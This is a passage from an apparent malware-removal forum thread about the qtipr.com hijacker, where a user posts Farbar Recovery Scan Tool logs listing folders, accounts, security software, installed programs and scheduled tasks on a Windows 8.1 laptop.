      2017-02-15 20:54 - 2016-11-05 13:00 - 00000000 ____D C:\Users\Alberto\ORLA PAYASADAS
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      2017-02-15 09:49 - 2014-10-08 00:29 - 00000000 ____D C:\WINDOWS\Minidump
      2017-02-15 09:49 - 2014-10-01 03:04 - 00000000 ___DC C:\Users\Alberto\AppData\Local\MigWiz
      2017-02-15 09:49 - 2014-04-03 19:15 - 00000000 ____D C:\WINDOWS\Panther
      2017-02-15 09:49 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\ModemLogs
      2017-02-14 23:10 - 2016-09-05 14:54 - 00000000 ____D C:\Program Files (x86)\Google
      2017-02-12 21:18 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\Documents\My Bluetooth
      2017-02-12 19:44 - 2015-09-19 16:45 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
      2017-02-12 00:10 - 2016-01-23 23:48 - 00000918 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
      2017-02-10 20:46 - 2014-11-12 05:12 - 00000000 ____D C:\Users\Alberto\PROYECTOS CUBASE
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\SysWOW64\w3data.vss
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\SysWOW64\msvcsv60.dll
      2017-02-10 19:19 - 2014-12-13 23:07 - 00000032 _____ C:\WINDOWS\msocreg32.dat
      2017-02-10 15:19 - 2014-05-09 14:34 - 00000000 ____D C:\ProgramData\Package Cache
      2017-02-10 15:17 - 2014-05-09 14:30 - 00000000 ____D C:\Program Files (x86)\Realtek
      2017-02-10 12:40 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\AppReadiness
      2017-02-09 19:15 - 2014-09-16 23:01 - 00000000 ____D C:\Users\Alberto
      2017-02-09 17:05 - 2016-09-02 22:06 - 00000000 ____D C:\Rct
      2017-02-09 17:05 - 2014-10-12 11:40 - 00000000 ____D C:\Muestras
      2017-02-09 12:58 - 2016-07-24 00:18 - 00000282 __RSH C:\ProgramData\ntuser.pol
      2017-02-09 12:57 - 2013-08-22 14:44 - 05283552 _____ C:\WINDOWS\system32\FNTCACHE.DAT
      2017-02-09 12:49 - 2013-08-22 15:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
      2017-02-09 12:08 - 2014-11-22 09:02 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Adobe
      2017-02-09 12:06 - 2014-09-18 19:17 - 00000000 ____D C:\Program Files\Adobe
      2017-02-09 12:00 - 2014-10-13 00:09 - 00000000 ____D C:\Users\Public\Documents\Adobe
      2017-02-09 11:51 - 2014-11-22 09:02 - 00000000 ____D C:\ProgramData\Adobe
      2017-02-09 11:34 - 2014-09-18 19:15 - 00000000 ____D C:\Program Files (x86)\Adobe
      2017-02-08 16:34 - 2013-08-22 13:25 - 00000167 _____ C:\WINDOWS\win.ini
      2017-02-07 11:26 - 2015-04-17 15:52 - 00000000 ____D C:\Users\Alberto\PROYECTOS PREMIERE
      2017-01-29 01:44 - 2016-11-28 00:04 - 00000000 ____D C:\Users\Alberto\MEXICO
      2017-01-28 19:23 - 2015-04-10 17:02 - 00000000 ____D C:\Users\Alberto\EXPORTADOS CUBASE
      2017-01-28 08:07 - 2015-01-18 02:56 - 00000000 ____D C:\ProgramData\Skype
      2017-01-25 11:38 - 2016-09-20 01:08 - 00000000 ____D C:\Users\Alberto\ANUNCIO SE BUSCA BAJO
      2017-01-22 17:26 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\AppData\Local\VirtualStore
      2017-01-21 23:20 - 2015-09-16 00:23 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

      ==================== Files in the root of some directories =======

      2015-05-22 00:15 - 2015-05-22 00:47 - 0000016 _____ () C:\Users\Alberto\AppData\Roaming\msregsvv.dll
      2014-09-16 23:02 - 2017-02-16 21:40 - 2128626 _____ () C:\Users\Alberto\AppData\Local\BTServer.log
      2016-06-16 03:17 - 2016-11-14 01:13 - 0465920 _____ (Dirección General de la Policía) C:\Users\Alberto\AppData\Local\DNIeService.exe
      2016-06-15 23:59 - 2016-06-15 23:59 - 0000017 _____ () C:\Users\Alberto\AppData\Local\resmon.resmoncfg
      2015-10-12 18:30 - 2015-10-12 18:30 - 0000057 _____ () C:\ProgramData\Ament.ini
      2015-05-22 00:15 - 2015-05-22 00:47 - 0000016 _____ () C:\ProgramData\autobk.inc
      2014-05-09 14:39 - 2014-05-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

      ==================== Bamital & volsnap ======================

      (There is no automatic fix for files that do not pass verification.)

      C:\WINDOWS\system32\winlogon.exe => File is digitally signed
      C:\WINDOWS\system32\wininit.exe => File is digitally signed
      C:\WINDOWS\explorer.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
      C:\WINDOWS\system32\svchost.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
      C:\WINDOWS\system32\services.exe => File is digitally signed
      C:\WINDOWS\system32\User32.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
      C:\WINDOWS\system32\userinit.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
      C:\WINDOWS\system32\rpcss.dll => File is digitally signed
      C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
      C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

      LastRegBack: 2017-02-12 04:31

      ==================== End of FRST.txt ============================

    4. #4
      User Darkor's avatar
      Registered
      Oct 2006
      Location
      Spain
      Posts
      9

      Re: Remove qtipr.com

      Addition file from Farbar Recovery

      Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-02-2017 02
      Ran by Alberto (16-02-2017 23:03:37)
      Running from C:\Users\Alberto\Desktop
      Windows 8.1 (Update) (X64) (2014-09-16 23:02:15)
      Boot Mode: Normal
      ==========================================================


      ==================== Accounts: =============================

      Administrador (S-1-5-21-1830392043-3884525579-1098650476-500 - Administrator - Disabled)
      Alberto (S-1-5-21-1830392043-3884525579-1098650476-1002 - Administrator - Enabled) => C:\Users\Alberto
      Invitado (S-1-5-21-1830392043-3884525579-1098650476-501 - Limited - Disabled)
      metal_000 (S-1-5-21-1830392043-3884525579-1098650476-1003 - Limited - Enabled)

      ==================== Security Center ========================

      (If an entry is included in the fixlist, it will be removed.)

      AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
      AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
      AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
      AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

      ==================== Installed Programs ======================

      (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

      µTorrent (HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\uTorrent) (Version: 3.4.8.42576 - BitTorrent Inc.)
      Actualización de NVIDIA 15.3.36 (Version: 15.3.36 - NVIDIA Corporation) Hidden
      Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
      Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
      Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
      Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
      Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
      Adobe Flash Player 24 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
      Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
      Adobe Media Encoder CC 2017 (HKLM-x32\...\AME_11_0_2) (Version: 11.0.2 - Adobe Systems Incorporated)
      Adobe Photoshop CS2 (HKLM-x32\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.)
      Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_2) (Version: 11.0.2 - Adobe Systems Incorporated)
      Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
      Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.4.154 - Adobe Systems, Inc.)
      AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.0 - IK Multimedia)
      ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
      Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
      bl (x32 Version: 1.0.0 - Your Company Name) Hidden
      CCleaner (HKLM\...\CCleaner) (Version: 5.27 - Piriform)
      Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
      Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
      Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
      Compatibilidad con Aplicaciones de Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
      Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.65.28.50 - Conexant)
      ConvertHelper 2.2 (HKLM-x32\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF51}_is1) (Version: - DownloadHelper)
      CyberLink PhotoDirector 3 (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.1.4107 - CyberLink Corp.)
      Dependency Package Update (Version: 1.6.29.00 - Lenovo Inc.) Hidden
      Dependency Package Update (Version: 1.6.38.00 - Lenovo Inc.) Hidden
      Dependency Package Update (x32 Version: 1.6.32.00 - Lenovo Group Limited) Hidden
      Dependency Package Update (x32 Version: 1.6.38.00 - Lenovo Group Limited) Hidden
      Dependency Package Update (x32 Version: 1.6.38.01 - Lenovo Group Limited) Hidden
      Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.5.1.1 - Dolby Laboratories Inc)
      Eines de correcció del Microsoft Office 2013: català (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.35 - Lenovo)
      Energy Manager (x32 Version: 1.0.0.35 - Lenovo) Hidden
      Estudio para la mejora del producto HP ENVY 4500 series (HKLM\...\{7AB1C3CE-613B-4078-8FDA-DE70E8A917E7}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
      EZdrummer (HKLM-x32\...\{43E8D9E7-AFC9-4BA3-8106-B95E02B87AB7}) (Version: 1.0 - Toontrack)
      EZdrummer 64-bit (HKLM\...\{80E801DB-5288-4447-AAC2-27F329B61C6E}) (Version: 1.3.3 - Toontrack)
      EZXDfh (HKLM-x32\...\{DB1299AF-9EE0-422B-959E-F4171B2AE0F7}) (Version: 1.0 - Toontrack)
      EZXMetalHeads (HKLM-x32\...\{F4F365AB-BD66-4775-A36A-E3D8055873FD}) (Version: 1.0.0 - Toontrack)
      Ferramentas de verificación de Microsoft Office 2013 - Galego (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Final Master Trial (HKLM-x32\...\{E622ECC4-4310-4D7B-B401-159E0C22516A}) (Version: - )
      Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
      Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
      HP ENVY 4500 series Ayuda (HKLM-x32\...\{083DCC02-5EB2-48B0-8BFF-F2D367F5AFB7}) (Version: 30.0.0 - Hewlett Packard)
      HP ENVY 4500 series Software básico del dispositivo (HKLM\...\{F1F56388-1766-41E4-BFBE-F23671D56574}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
      HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
      HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
      HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
      HP Support Solutions Framework (HKLM-x32\...\{7B649B69-BE85-4011-AFAE-4767BC9D934A}) (Version: 12.5.32.203 - Hewlett-Packard Company)
      HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
      HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
      Intel(R) C++ Redistributables for Windows* on Intel(R) 64 (HKLM-x32\...\{D2437C5C-2D8C-40D2-8059-689AD7239FA3}) (Version: 11.1.048 - Intel Corporation)
      Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
      Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3379 - Intel Corporation)
      Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
      Lenovo Dependency Package (HKLM\...\Lenovo Dependency Package_is1) (Version: 1.6.38.00 - Lenovo Group Limited)
      Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10256 - Realtek Semiconductor Corp.)
      Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
      Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
      Lenovo pointing device (HKLM\...\Elantech) (Version: 11.4.31.1 - ELAN Microelectronic Corp.)
      Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5630.52 - CyberLink Corp.)
      Lenovo PowerDVD10 (x32 Version: 10.0.5630.52 - CyberLink Corp.) Hidden
      Malwarebytes Anti-Malware versione 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
      Malwarebytes versión 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
      Manuales de usuario (x32 Version: 3.0.0.3 - Lenovo) Hidden
      Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
      Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
      Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
      Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
      Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
      Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
      Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
      Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
      Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
      Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
      Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
      Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
      Microtool version 1.1.0 (HKLM-x32\...\Microtool_is1) (Version: 1.1.0 - Microtool Technologies)
      Native Instruments Abbey Road 60s Drums Vintage (HKLM-x32\...\Native Instruments Abbey Road 60s Drums Vintage) (Version: - Native Instruments)
      Native Instruments Guitar Rig 5 (HKLM-x32\...\Native Instruments Guitar Rig 5) (Version: - Native Instruments)
      Native Instruments Guitar Rig Elements for Maschine (HKLM-x32\...\Native Instruments Guitar Rig Elements for Maschine) (Version: - Native Instruments)
      Native Instruments Komplete Elements Mk2 (HKLM-x32\...\Native Instruments Komplete Elements Mk2) (Version: - Native Instruments)
      Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.5.0.409 - Native Instruments)
      Native Instruments Kontakt Elements Selection R2 (HKLM-x32\...\Native Instruments Kontakt Elements Selection R2) (Version: - Native Instruments)
      Native Instruments Reaktor 5 (HKLM-x32\...\Native Instruments Reaktor 5) (Version: 5.9.3.1344 - Native Instruments)
      Native Instruments Reaktor Elements Selection (HKLM-x32\...\Native Instruments Reaktor Elements Selection) (Version: - Native Instruments)
      Native Instruments Reaktor Spark R2 (HKLM-x32\...\Native Instruments Reaktor Spark R2) (Version: 1.4.0.3 - Native Instruments)
      Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: - Native Instruments)
      NVIDIA Controlador de gráficos 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
      NVIDIA GeForce Experience 2.1.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1.1 - NVIDIA Corporation)
      NVIDIA Software del sistema PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
      Onekey Theater (HKLM-x32\...\{91CC5BAE-A098-40D3-A43B-C0DC7CE263FE}) (Version: 3.0.1.2 - Lenovo)
      Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
      Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden
      Panel de control de NVIDIA 340.52 (Version: 340.52 - NVIDIA Corporation) Hidden
      Paquete de controladores de Windows - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
      Paquete de controladores de Windows - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
      Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
      ph (x32 Version: 1.0.0 - Your Company Name) Hidden
      Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.10525 - CyberLink Corp.)
      PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
      QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
      REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 3.805.802.010814 - REALTEK Semiconductor Corp.)
      Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.39052 - Realtek Semiconductor Corp.)
      Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
      REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0238 - REALTEK Semiconductor Corp.)
      Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
      RollerCoaster Tycoon 3 Platinum (HKLM-x32\...\{907B4640-266B-4A21-92FB-CD1A86CD0F63}) (Version: 1.00.000 - Atari)
      Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
      Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
      SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
      SketchUp 2016 (HKLM\...\{1EE5F772-57F4-4299-8029-68F8A815E896}) (Version: 16.0.19912 - Trimble Navigation Limited)
      Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
      Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
      Steinberg Cubase 5 (HKLM-x32\...\{4A19D6AC-ADE0-4A07-80FF-9C9812C45557}) (Version: 5.1.0 - Steinberg Media Technologies GmbH)
      swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
      The Logo Creator v5.2 (HKLM-x32\...\The Logo Creator v5.2) (Version: - )
      T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia)
      Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{28C1EB1A-45AC-4B12-887F-98EE0AA0D6DD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      Update for Skype for Business 2015 (KB3161988) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{E1C47F57-5CCA-4077-96A6-7BFD2A026ECD}) (Version: - Microsoft)
      User Manuals (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 3.0.0.3 - Lenovo)
      vs2015_redist x86 (x32 Version: 1.0.0.0 - Realnetworks) Hidden
      WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
      World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
      World of Warcraft Beta (HKLM-x32\...\World of Warcraft Beta) (Version: - Blizzard Entertainment)
      Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
      Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (x32 Version: 11.0.51108 - Microsoft Corporation) Hidden

      ==================== Custom CLSID (Whitelisted): ==========================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      CustomCLSID: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

      ==================== Scheduled Tasks (Whitelisted) =============

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      Task: {06D56526-9F10-477D-B65A-63E8FE546F14} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
      Task: {0A8A9849-EB9B-4DCA-858C-32DC3AAACBA6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
      Task: {0EBF8667-3555-47E3-BB56-8CFAE022F38A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
      Task: {1152AFEA-D3CE-4F61-95F8-2C2B2ACD86E1} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
      Task: {2097C426-8633-4333-8D04-F487D83D409B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-02-08] (Piriform Ltd)
      Task: {23D93F60-8E6B-46C3-AF5F-859400E20B57} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
      Task: {24CF3464-BBD4-4701-9651-D44FCFD59823} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN55Q341TN => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
      Task: {316C4298-F598-4ED6-A188-CA245D09248A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-08-18] (Lenovo)
